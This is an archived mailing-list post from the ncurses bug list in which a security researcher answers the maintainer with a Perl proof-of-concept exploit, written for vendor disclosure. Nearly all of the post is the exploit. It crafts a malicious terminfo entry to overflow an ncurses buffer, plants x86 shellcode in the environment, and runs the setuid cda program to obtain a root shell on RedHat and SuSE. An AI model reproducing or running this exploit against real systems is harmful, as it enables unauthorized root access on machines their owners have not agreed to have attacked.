bug-ncurses
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: ncurses buffer overflows (fwd)

From: Jouko Pynnönen
Subject: Re: ncurses buffer overflows (fwd)
Date: Mon, 2 Oct 2000 19:00:52 +0300 (EEST) 
On Mon, 2 Oct 2000, Thomas E. Dickey wrote:

> I'd like to see the exploit: there are too many perhaps/maybes in this

This is a demonstration script I sent to linux people on
address@hidden, works straight on rh-6.2 and SuSE-6.4, other platforms
may need fiddling with the number values...

  Jouko

------------------------------------------------------------------------------
#!/usr/bin/perl
#
# Proof of concept exploit for ncurses and cda,
# gives root on SuSE and RedHat.
# (c) 2000 Jouko Pynnonen
# This was written for vendors for informational purposes -
# do not distribute.
#
# Type stty sane <ctrl-j> when the shell starts to get keyboard echo back.

$offset=shift;
$buflen=shift;
$align=shift;
if (!$offset) { $offset=0; }
if (!$buflen) { $buflen=500; }
if (!$align) { $align=0; }


# create the evil terminfo file

$addr1=pack("L",0xbfffff10+$offset);
($b1,$b2,$b3,$b4)=unpack("C4",$addr1);

open(A,">infofile") || die("Can't write infofile");
print A "
evilterm,
        am, bce, eo, mir, msgr, xenl, xon,
        cols#80, it#8, lines#25,";
$addr="%{$b4}%{$b3}%{$b2}%{$b1}%c%c%c%c";
$prepad='x' x $align;
$postpad='y' x (4-$align);
print A "cup=$prepad%0".$buflen."d".($addr x 30).($bddr x 
$addrlen)."$postpad,\n";
close A;

# compile it
system("tic infofile -o ~/.terminfo 2>/dev/null");

# stabilize env
foreach $e (keys %ENV) {
        delete $ENV{$e} unless $e eq 'HOME';
        }
$ENV{"PATH"}="/bin:/usr/bin:/usr/X11R6/bin";
$ENV{"TERM"}="evilterm";
$ENV{"TERMINFO_DIRS"}="$ENV{'HOME'}/.terminfo:/usr/share/terminfo";
$ENV{"SHELLCODE"}=("\x90" x 200).
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89".
"\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89".
"\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/tmp/sh";

if (! -f "/tmp/sh") {
        if (-f "/bin/ash") { system("cp -f /bin/ash /tmp/sh"); }
                else { system("cp -f /bin/sh /tmp"); }
        }

system("mkdir -p tmp/config;touch tmp/config/common.cfg tmp/config/null");
$ENV{"XMCD_LIBDIR"}="tmp";
$st=system("cda -dev /dev/null visual");
if ($st != 0) { print "exit status: $st\n"; }
reply via email to
[Prev in Thread] Current Thread [Next in Thread]